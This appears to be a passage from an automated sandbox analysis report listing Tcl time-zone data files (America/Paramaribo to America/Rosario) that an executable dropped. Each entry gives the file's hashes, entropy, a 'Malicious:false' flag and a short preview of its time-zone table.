                                                                                                                                                                                                                              Entropy (8bit):4.784405839512086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290olofDm2OHekeoHXFIV/1Vw/9vVOzFZg/VVFAKV:MB86290oloLmdHeVCXqV/k/9v4zW/OW
                                                                                                                                                                                                                              MD5:BFCE7E2618D6935031D6941AD6DDD8E3
                                                                                                                                                                                                                              SHA1:1953CD224FB2363B10372C0476760F3FB020CB00
                                                                                                                                                                                                                              SHA-256:B3EE44B3526BEDFC25B806371D3C465FDBD6CC647F30BF093750651E4A0C1BE4
                                                                                                                                                                                                                              SHA-512:31262DF034E084DA4CDB57B99178594C29129F61F3535E5D8245B8BB4AB6BF314307B0F5E58B74C349684CD761C9CDE44EB10407FB135BA6427D3D1E9DA99B40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Paramaribo) {.. {-9223372036854775808 -13240 0 LMT}.. {-1861906760 -13252 0 PMT}.. {-1104524348 -13236 0 PMT}.. {-765317964 -12600 0 -0330}.. {465449400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                              Entropy (8bit):4.444598497301421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290OXmdH514YCvb8o1W4S9xRvhhHRVxORBYUNv:5tekdvYP1x52yq
                                                                                                                                                                                                                              MD5:062ECA57C0B795780240CD7AFE70BDA0
                                                                                                                                                                                                                              SHA1:89D71A11DD8D4E000F7FADBDDC77C4C1DC1195F7
                                                                                                                                                                                                                              SHA-256:DFA0EC91804B789A1A7E1B1977710435D2589A5B54C1579C8E1F5BF96D2FD007
                                                                                                                                                                                                                              SHA-512:7D123AA872E0B8286A26E338AE0F8E0D7A6F0F2EA8B1EBEC6DBB59477C812985CB246AD397D0901A58FDB7FF14171CF60169DC15C538B95C58BD2D46106A7A4D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Phoenix) {.. {-9223372036854775808 -26898 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-820519140 -25200 0 MST}.. {-796841940 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-56221200 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6613
                                                                                                                                                                                                                              Entropy (8bit):3.8549788442269395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ux+E2p3T6ZqrNSMEBPMcywh4NF5zCC7IOTWa1HW1241UWK9BDL+3XC4BMrS2LxP:KOfS0HY2iU7KKdFL6Aa2K4gSLf8e
                                                                                                                                                                                                                              MD5:A720323DF122C70C1530788DB24700BA
                                                                                                                                                                                                                              SHA1:20674BD7D84CC686ABBB5D6B36B520A5E9C813ED
                                                                                                                                                                                                                              SHA-256:A89C580899AD2FF8DF45A783BB90D501DC32C28B92931CA18ABD13453E76244B
                                                                                                                                                                                                                              SHA-512:02B71E537B9FDAF1B68E381F0007CCBBA53EB70719ED38F51B56C5BFA64C7E3D9797053C9DE3A920E5CAFA09BBC062FCED62B5D6B9213AFA8286B95DEDAB0532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Port-au-Prince) {.. {-9223372036854775808 -17360 0 LMT}.. {-2524504240 -17340 0 PPMT}.. {-1670483460 -18000 0 EST}.. {421218000 -14400 1 EDT}.. {436334400 -18000 0 EST}.. {452062800 -14400 1 EDT}.. {467784000 -18000 0 EST}.. {483512400 -14400 1 EDT}.. {499233600 -18000 0 EST}.. {514962000 -14400 1 EDT}.. {530683200 -18000 0 EST}.. {546411600 -14400 1 EDT}.. {562132800 -18000 0 EST}.. {576050400 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607500000 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638949600 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671004000 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {702453600 -14400 1 EDT}.. {719992800 -18000 0 EST}.. {733903200 -14400 1 EDT}.. {752047200 -18000 0 EST}.. {765352800 -14400 1 EDT}.. {783496800 -18000 0 EST}.. {796802400 -14400 1 EDT}.. {814946400 -18000 0 EST}.. {828856800 -14400 1 EDT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.919510214047913
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290e7490ppv:MByMYbpwt290190b
                                                                                                                                                                                                                              MD5:4AB394CB233B101627136EB5E070CF9B
                                                                                                                                                                                                                              SHA1:F00600CD2DB10FE157C3696F665B9759EEA85F99
                                                                                                                                                                                                                              SHA-256:A4952380C89A6903FFE5BF8707B94B1BB72568FFD03DB04BF4D98E38AC82EEB7
                                                                                                                                                                                                                              SHA-512:58F4AD08FA10F1884FA641C4EA778C0FC013EABBD68DF5DE04D5B301227396260C3D669DB33DD6A6B33F1550C24BBD7777D756DF0D61CEEAF5EC6541EDFA296C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Port_of_Spain) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.866417687745155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/290msh490th4:MByMYdIp7t290v490I
                                                                                                                                                                                                                              MD5:6B570E79FA2AA7D6CB1E56A11EE0A37C
                                                                                                                                                                                                                              SHA1:396A2C9BBE4F264DD5A4F2E44D3E63C57F52186B
                                                                                                                                                                                                                              SHA-256:52921EEA2A1925DF06CEA4638ED4128FAAA8FBA40ED4E0741650B419E5152DCB
                                                                                                                                                                                                                              SHA-512:FA75A179664BED02A0F5BC1B7C3DD5F3E986544A151634BA4C4401476F5999714C89E240D9AF805484D1BEC04A1A562157FAEECA1603C4FF8CFFB424B9DEB560
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1051
                                                                                                                                                                                                                              Entropy (8bit):3.851275104153641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Xe4QJnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/8:5kSeSFESoSQSrSsCSeSPS1cSQSQlSsSX
                                                                                                                                                                                                                              MD5:03046BA6F8344C32AD7A22748DC871AB
                                                                                                                                                                                                                              SHA1:AB9ED078D80AE99EF6DE4BF34AC45359B82D1284
                                                                                                                                                                                                                              SHA-256:E6E6F6753E7D443052A64D4DB07B8D443CE13A573946E7D0A19CDD4BBA4A2F04
                                                                                                                                                                                                                              SHA-512:620953BB4C8CF203262EC0C1F807543D24B9894C3B531AE57F7CEF630452CC9AC7CA41D43A6D8891F9CF17594E9EE34CF501F8508E7C0669A8E5EF9C70B6EAA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Porto_Velho) {.. {-9223372036854775808 -15336 0 LMT}.. {-1767210264 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {5712012
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):283
                                                                                                                                                                                                                              Entropy (8bit):4.781646667761219
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290piDm2OH9VoHvMlFoeVVF70ZVVFUFkzk/lLJpR/lAov:MB862908mdHvCvMlGe/J0Z/uFkzk/lL1
                                                                                                                                                                                                                              MD5:E2E2E0D6677FFF2E37BBFC3522F2A9AA
                                                                                                                                                                                                                              SHA1:4C1C93E14FBC00B8B1E78B8D9631599164305EB1
                                                                                                                                                                                                                              SHA-256:2981248A9F14EBFC8791EC5453170376CBD549557E495EA0E331CC18556C958E
                                                                                                                                                                                                                              SHA-512:F056B03EB9945823F5284C840E06E298DD2DE854F1555CD16D0BB19D962B73EF34A05683E6369B0D89CB7C3F7D082C312CCA6F8C6A0BB53F5C75FE4A863FCD95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Puerto_Rico) {.. {-9223372036854775808 -15865 0 LMT}.. {-2233035335 -14400 0 AST}.. {-873057600 -10800 0 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3729
                                                                                                                                                                                                                              Entropy (8bit):3.6253057710886956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:2RPW7xUQjzoMUBI0nuUoDKlHslPlgiot7JC/Xk8NWse4r4g5xCEmSdLkUsZOn+ZW:247xUQjzoMUBI0nuUoDK6lPlgiot7JCV
                                                                                                                                                                                                                              MD5:D4ECD2A380E55A10FB97AB1D29C619F3
                                                                                                                                                                                                                              SHA1:AAAFF44590F08623BE6F61EA6EFF6488C99A73BF
                                                                                                                                                                                                                              SHA-256:4E626BD8B9182E56ADA1E9276585E945957431EA9BEA949CE071305E4E3C70A2
                                                                                                                                                                                                                              SHA-512:677EE7093A53B48DE526C5877DB7128E8746831FE0DC44A38EB84050757E6017C9471EEF9AFCCEEEB5794D1608E486840804C01BD6276EA53F3C7823B05ED62B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Punta_Arenas) {.. {-9223372036854775808 -17020 0 LMT}.. {-2524504580 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-736632000 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}.. {37767600 -14400 0 -04}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.926514352074701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7pYHAIgppuRN/290ly90pl:MByMY/pcRt290w90X
                                                                                                                                                                                                                              MD5:552FBD2FBAD42F79C7993124D9CCC54B
                                                                                                                                                                                                                              SHA1:9029B7CCE8A5AD0F14C05FFBCDA4CA225DEC1708
                                                                                                                                                                                                                              SHA-256:FEC74A3FCBD9B99FDFF24B54223DA187958697CBE756A54592F6171C69F1403F
                                                                                                                                                                                                                              SHA-512:96315C32C1D0DEF804A560022DA12B3C63200A680F2A37D1B03E1C9EA413842EB6051E1C2315AE4E7C374280AD0E59832F834A8D6D66E259EF62735A77917ECE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:America/Rainy_River) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7614
                                                                                                                                                                                                                              Entropy (8bit):3.8349162993762267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Wi8h4ZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:bqOfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:793DAEDB7E3077DE52DCC3C8A7CBEC5B
                                                                                                                                                                                                                              SHA1:37562E9F28D51DED41FFD5FF2FF19E2E4E453B7A
                                                                                                                                                                                                                              SHA-256:AA8866D58BEAB07548180628FF423887BBF48AADB1B55392B288F7310F94A9B1
                                                                                                                                                                                                                              SHA-512:68A32B41DC2D3E730D6BE53656B0D566AB1BCC1E189A2FFDB5687A947EF4F4008BC17456F8CE0D59C838EEA87A44400231A44E6AB35BEDBF5D7779E1CD7EFD8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rankin_Inlet) {.. {-9223372036854775808 0 0 -00}.. {-410227200 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                              Entropy (8bit):3.78262494063765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5aLexyGcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaI1kR8nd:5eTChlvEw6kSSx5H4a8tf3fkuoYVZDm+
                                                                                                                                                                                                                              MD5:4D12651CEE804EB9F29567CB37F12031
                                                                                                                                                                                                                              SHA1:54B2613475B8BDB1DBCCA53A4895DA021F66BDC0
                                                                                                                                                                                                                              SHA-256:A36AD4614FC9A2A433712B555156EDE03980B88EB91D8DC7E8B10451D6D7F7D3
                                                                                                                                                                                                                              SHA-512:E6690F6B6DF613C8B7289A2DB71FBC9B87B997707A6C3B4B45BDE8F347082AE8C69F212BAACE50F3C04E325ABE0976AF1F61107BDF8A15D5B88F11FAE11A9D00
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Recife) {.. {-9223372036854775808 -8376 0 LMT}.. {-1767217224 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1781
                                                                                                                                                                                                                              Entropy (8bit):4.034282439637634
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290hjmdHfCv24Q1NAvHaE+YB+Q4kRcMxIeRUVX/SEQd1rRR9xRv0+Ro/wPjp:5EjeavTGOtAVvSRBpx0yq1epwD+yz+
                                                                                                                                                                                                                              MD5:14B29B4391B643E5707096ADCC33C57E
                                                                                                                                                                                                                              SHA1:B3F875ABB79C634C74307B7CB7B276B13AEE11D1
                                                                                                                                                                                                                              SHA-256:50105E788288CF4C680B29BBDCDE94D8713A5361B38C6C469FD97CF05503FF7D
                                                                                                                                                                                                                              SHA-512:D92A51547DF2C1AB6E6CDEFF34C07B755D3F6BB5E7DD1907693E7658EDE4D2BADC5DEFDB658ADD0F8D8F14B3B87CEA17BC00DAC364C5CB7ACBF8778C245276A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Regina) {.. {-9223372036854775808 -25116 0 LMT}.. {-2030202084 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1251651600 -21600 1 MDT}.. {-1238349600 -25200 0 MST}.. {-1220202000 -21600 1 MDT}.. {-1206900000 -25200 0 MST}.. {-1188752400 -21600 1 MDT}.. {-1175450400 -25200 0 MST}.. {-1156698000 -21600 1 MDT}.. {-1144000800 -25200 0 MST}.. {-1125248400 -21600 1 MDT}.. {-1111946400 -25200 0 MST}.. {-1032714000 -21600 1 MDT}.. {-1016992800 -25200 0 MST}.. {-1001264400 -21600 1 MDT}.. {-986148000 -25200 0 MST}.. {-969814800 -21600 1 MDT}.. {-954093600 -25200 0 MST}.. {-937760400 -21600 1 MDT}.. {-922039200 -25200 0 MST}.. {-906310800 -21600 1 MDT}.. {-890589600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-748450800 -21600 1 MDT}.. {-732729600 -25200 0 MST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7610
                                                                                                                                                                                                                              Entropy (8bit):3.8312000314798085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:li8h4Z80NA604qSScBgN+4ctDzIVQ/c/3hNxTh:EqOzA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:541EACD872723603971058CB205121D7
                                                                                                                                                                                                                              SHA1:8F7DFD5ECA2913846D9342839AE1C60882153DA0
                                                                                                                                                                                                                              SHA-256:643CC43E3F906779C040E1F0C20E78D6E95CC7301B3C7370A8ADBCBD76A8C5E8
                                                                                                                                                                                                                              SHA-512:971D06D3FB67B7AE79EEDB6D3EBB805B5992C2BF4A7166016B405E21BFB25D9A87A757E8065073D5FBEB9084F6F742269A5BF432BF2F03D30913DB092E1AB3A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Resolute) {.. {-9223372036854775808 0 0 -00}.. {-704937600 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {73391
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.8413073465060457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Ybe/k5Yss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6Gs:505YsMw57XJh4CxUF/A6GTrtSUDwr
                                                                                                                                                                                                                              MD5:7E23FDE0E158E8ED2E7536EDE70D2588
                                                                                                                                                                                                                              SHA1:319052BE076DC79F130E807D68B11CCAA0636340
                                                                                                                                                                                                                              SHA-256:28082D20872B61D6098D31D1C40F12464A946A933CD9AF74475C5AF384210890
                                                                                                                                                                                                                              SHA-512:BE078ED12F05AB5CEE5D77212EB76A01A1BC52EEAA17E3B91D93B88D75E5281B6AF164E712A9AB0F57A21B3CDB20F6FCCADB73CAC4745B5D2E665D18F9F06B55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rio_Branco) {.. {-9223372036854775808 -16272 0 LMT}.. {-1767209328 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {57120480
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.801485647578614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/290rI5290/M7:MByMY/M7p/M16t290r190/M7
                                                                                                                                                                                                                              MD5:90830F3B1F91FE48AC2944C7C92A3F6E
                                                                                                                                                                                                                              SHA1:777377AE4959DDD2B472EB6041A23A5B93D64BB6
                                                                                                                                                                                                                              SHA-256:0117D33D4F326AA536162D36A02439FBD5F2EB3B4F540B5BA91ED7747DDAC180
                                                                                                                                                                                                                              SHA-512:20A371E4550E402AFEB83EF19EFFF6B3C0D7A68DCAA06AD894D04DB63B7096560E701C45B455B23A98BB20FE3B590F920219152415CA506AEDA427BB1381B826
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.869058214823402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7ekHAIgpeON/290tX2U490eBn:MByMYMpJt290c90m
                                                                                                                                                                                                                              MD5:F4E62378AA05771D348AA6DA516CD386
                                                                                                                                                                                                                              SHA1:07FCA813693F7944CBCBB128F2F2FE32929D37A2
                                                                                                                                                                                                                              SHA-256:3B4C2F3A5B9CD22A73F05187C032723D07BB53C9946D04D35E1BA1CB90CA0A62
                                                                                                                                                                                                                              SHA-512:E9F6CEB824D656CA25A72BF8EB4347A22E1A8E40410F01E0C2EDE19ACAF32D76540399796B3EBC7781C8B5D48C1A6B2C856CA06158AE37D95C95CF0567DFA2E5
                                                                                                                                                                                                                              Malicious:false
